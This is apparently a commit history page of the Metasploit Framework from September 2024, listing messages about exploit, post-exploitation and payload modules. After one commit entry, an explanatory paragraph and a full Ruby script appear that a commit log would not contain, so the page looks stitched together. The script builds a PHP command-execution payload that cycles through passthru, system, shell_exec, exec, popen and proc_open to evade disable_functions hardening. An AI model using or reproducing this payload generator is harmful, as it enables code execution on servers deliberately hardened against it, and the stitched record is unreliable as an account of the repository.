Commit Graph

38478 Commits

Author SHA1 Message Date
Alex 1e67d200d2 Update modules/post/windows/gather/enum_browsers.rb
Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com>
2024-09-27 08:02:48 +02:00
jheysel-r7 94c19395f3 Merge pull request #19466 from jvoisin/singles_php
Use php_preamble/php_system_block instead of `system` in payloads/singles/php/
2024-09-26 20:35:40 -04:00
Chocapikk c2a803aba3 Lint 2024-09-27 01:25:37 +02:00
Chocapikk 10a4b24ed7 Better file clean 2024-09-27 01:17:07 +02:00
h00die-gr3y c43a4f4b0b Fixed cluster ID issue 2024-09-26 21:53:27 +00:00
Chocapikk 2304bde907 Add suggestions + clean database files during on_new_session 2024-09-26 23:48:51 +02:00
jheysel-r7 05ff8359b8 Merge pull request #19436 from h4x-x0r/CVE-2024-6670
WhatsUp Gold SQL Injection (CVE-2024-6670) Module
2024-09-26 17:04:30 -04:00
Brendan dbc020a745 Merge pull request #19441 from Takahiro-Yoko/cve_2023_0386_priv_esc
Land #19441, Add module: Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386
2024-09-26 14:07:17 -05:00
Alex 78f7327ea7 Update enum_browsers.rb 2024-09-26 20:49:42 +02:00
Alex 6cc6841821 Update modules/post/windows/gather/enum_browsers.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-09-26 20:44:45 +02:00
Valentin Lobstein a9901d00a9 Update modules/exploits/unix/webapp/byob_unauth_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 20:24:24 +02:00
Valentin Lobstein 499a1c30b5 Update modules/exploits/unix/webapp/byob_unauth_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 20:24:14 +02:00
Valentin Lobstein 96f9bf61ac Update modules/exploits/unix/webapp/byob_unauth_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 20:24:02 +02:00
Alex f106f1cf2c Add enum_browsers post exploitation module
This post-exploitation module extracts sensitive browser data from both Chromium-based and Gecko-based browsers on the target system. It supports the decryption of passwords and cookies using Windows Data Protection API (DPAPI) and can extract additional data such as browsing history, keyword search history, download history, autofill data, and credit card information.
2024-09-26 19:21:42 +02:00
Spencer McIntyre b41caa22d9 Merge pull request #19475 from NtAlexio2/smb_modules_rport
Allow setting the RPORT option for pipe_auditor
2024-09-26 09:19:27 -04:00
h4x-x0r abddaf5657 Limit terminal output
Use TICKETSTODUMP instead of n characters
2024-09-26 05:43:55 +01:00
h4x-x0r e80c66d80a linting 2024-09-26 05:08:41 +01:00
h4x-x0r ac711e32a0 minor updates
added report_vuln, report_service, limited console output
2024-09-26 05:04:38 +01:00
h4x-x0r c20b1d8a03 minor fixes
minor fixes
2024-09-26 04:01:36 +01:00
jheysel-r7 d9f1a061b3 Merge branch 'master' into singles_php 2024-09-25 20:41:08 -04:00
jheysel-r7 256fd9c242 Merge pull request #19451 from jvoisin/phpnop
Improve modules/nops/php/generic.rb
2024-09-25 19:45:37 -04:00
Alex Romero 09ffbde5fe Update modules/auxiliary/scanner/smb/pipe_auditor.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 01:57:32 +03:30
Alex Romero e517aaf716 Update modules/auxiliary/scanner/smb/pipe_auditor.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 01:57:19 +03:30
Alex Romero 23f062af53 Update modules/auxiliary/scanner/smb/pipe_auditor.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 01:56:52 +03:30
jheysel-r7 456c57b031 Merge pull request #19453 from Chocapikk/vicidial_sqli
Add VICIdial Time-based SQL Injection Module (CVE-2024-8503)
2024-09-25 14:19:42 -04:00
h4x-x0r d4cd4aa843 added check method
added check method
2024-09-25 17:41:49 +01:00
h4x-x0r 174ed4ec97 minor improvements
minor improvements
2024-09-25 17:29:04 +01:00
h4x-x0r d391999c92 Initial draft
Initial draft
2024-09-25 14:06:40 +01:00
h4x-x0r ac56da3d21 CVE-2024-28987
CVE-2024-28987
2024-09-25 13:16:09 +01:00
NtAlexio2 e365138387 update and display correct rport 2024-09-24 16:32:02 -04:00
jheysel-r7 d11c2be4ea Merge pull request #19375 from h4x-x0r/CVE-2024-20419
Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419) Module
2024-09-24 12:19:54 -04:00
Takah1ro 6d541b625f Remove unnecessary shell_path 2024-09-24 08:18:30 +09:00
Takahiro Yokoyama 130f146819 Apply suggestions from code review
Change to call setgid and setuid in the exploit before executing the payload

Co-authored-by: Brendan <bwatters@rapid7.com>
2024-09-24 08:06:26 +09:00
Jack Heysel 8e2dbbbd56 Land #19416, Add Traccar RCE module
This module exploits two vulnerabilities in Traccar v5.1 - v5.12 to
obtain remote code execution: A path traversal vulnerability
CVE-2024-24809 and an unrestricted file upload vulnerability
CVE-2024-31214.
2024-09-23 15:25:02 -07:00
jheysel-r7 e0e7c67ff7 Remove jsessionid parsing now that keep_cookies is being used 2024-09-23 18:12:01 -04:00
Jack Heysel f254eeb65e Added error handling 2024-09-23 14:16:26 -07:00
Jack Heysel b475f0dccb Land #19448, Improve screensaver management
Add a number of improvements to modules/post/multi/manage/screensaver.rb
2024-09-23 08:31:38 -07:00
h4x-x0r 322188a112 Refactoring
Refactored code to remove duplicate requests
2024-09-23 13:29:46 +01:00
Chocapikk 9e6adea0dc Add BYOB Unauthenticated RCE module exploiting arbitrary file write and command injection (CVE-2024-45256, CVE-2024-45257) 2024-09-21 04:00:56 +02:00
adfoster-r7 ab7e02d23f Merge pull request #19397 from sjanusz-r7/replace-readline-with-reline
Replace Readline with Reline
2024-09-20 14:23:40 +01:00
h00die-gr3y 8e62f22315 fifth release with the option to use your own SSH private key 2024-09-20 09:50:13 +00:00
h00die-gr3y 8b197a60f9 fourth release addressing review comments of jheysel-r7 2024-09-19 20:54:55 +00:00
Chocapikk 0515a1d3bc Update comment 2024-09-19 22:36:07 +02:00
Chocapikk f715cc68df Randomize values + add function to delete campaign 2024-09-19 22:33:50 +02:00
NtAlexio2 48765fbfa5 allow setting the RPORT option for pipe_auditor 2024-09-19 10:43:40 -04:00
NtAlexio2 b172ef8d69 bugfix rport in smb_enumusers 2024-09-19 10:42:10 -04:00
Chocapikk ae8df6c34b Add working documentation + working exploit 2024-09-18 17:00:18 +02:00
jvoisin b7fff5926b Use php_preamble/php_system_block instead of system in payloads/singles/php/
The `php_preamble`/`php_system_block` combo has builtin low-hanging evasion for
PHP's `disabled_functions` configuration (eg. `system` might not be available
but `shell_exec` is), so use it instead of hardcoding `system`.

This commit also brings modules/payloads/singles/php/reverse_perl.rb's style
more in line with the other uses of `php_preamble`/`php_system_block`.

Oh, and it makes lib/msf/core/payload/php.rb work on older Ruby versions as
well.

Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com>
2024-09-18 12:40:55 +02:00
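The commit above replaces hardcoded `system` calls with the `php_preamble`/`php_system_block` helpers because a PHP `disable_functions` list often removes `system` but leaves `shell_exec`, `passthru` or `proc_open` reachable. The following Ruby is an added example of that fallback technique, not the code in Metasploit's lib/msf/core/payload/php.rb: it emits a PHP fragment that probes each execution primitive with `is_callable()` at runtime and uses the first one the configuration did not disable. The constant `EXEC_PRIMITIVES` and the functions `pick_primitive`, `php_exec_chain` and `php_payload` are names chosen for this example.

```ruby
# Added example (not Metasploit's php_preamble/php_system_block code).
# Generates a PHP fragment that falls back across several command-execution
# functions, so a disable_functions list that removes `system` but forgets
# `shell_exec` does not break the payload.

# Each entry: the PHP function that must be callable, and the PHP statement
# that runs $cmd through it and prints the output. Order is preference order.
EXEC_PRIMITIVES = [
  ['passthru',   'passthru($cmd);'],
  ['system',     'system($cmd);'],
  ['shell_exec', 'echo shell_exec($cmd);'],
  ['exec',       'exec($cmd, $o); echo implode("\n", $o);'],
  ['popen',      '$p = popen($cmd, "r"); while (!feof($p)) { echo fread($p, 4096); } pclose($p);'],
  ['proc_open',  '$p = proc_open($cmd, [1 => ["pipe", "w"]], $pipes); ' \
                 'echo stream_get_contents($pipes[1]); proc_close($p);'],
].freeze

# Pure-Ruby model of the runtime decision: given the names a target has put in
# disable_functions, which primitive would the generated PHP end up using?
# Returns nil when every candidate is disabled.
def pick_primitive(disabled, primitives = EXEC_PRIMITIVES)
  entry = primitives.find { |name, _body| !disabled.include?(name) }
  entry && entry.first
end

# Build the PHP if/else chain. is_callable() reports false for a function that
# disable_functions removed, so the probe itself does not emit the
# "has been disabled for security reasons" warning that calling it would.
def php_exec_chain(primitives = EXEC_PRIMITIVES)
  branches = primitives.map do |name, body|
    "if (is_callable('#{name}')) { #{body} }"
  end
  branches.join(' else ') + " else { echo 'no exec primitive'; }"
end

# Wrap the chain in a complete PHP payload with the command embedded as a
# single-quoted literal (only backslash and quote need escaping there).
def php_payload(cmd)
  literal = "'" + cmd.gsub(/['\\]/) { |c| "\\#{c}" } + "'"
  "<?php $cmd = #{literal}; #{php_exec_chain} ?>"
end

if __FILE__ == $0
  puts php_payload('id')
  puts "target with system+passthru disabled would use: #{pick_primitive(%w[system passthru])}"
end
```

Run with `ruby` to print the generated payload; the `pick_primitive` helper is only a model of the decision the emitted PHP makes on the target, useful when writing a module's `check` logic or documenting which primitive a particular hardened host will fall back to.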
Chocapikk 005dc4941d Update (still working on it) 2024-09-17 23:50:16 +02:00
h00die-gr3y 9971aed96f third release addressing majority of the review comments 2024-09-17 19:23:38 +00:00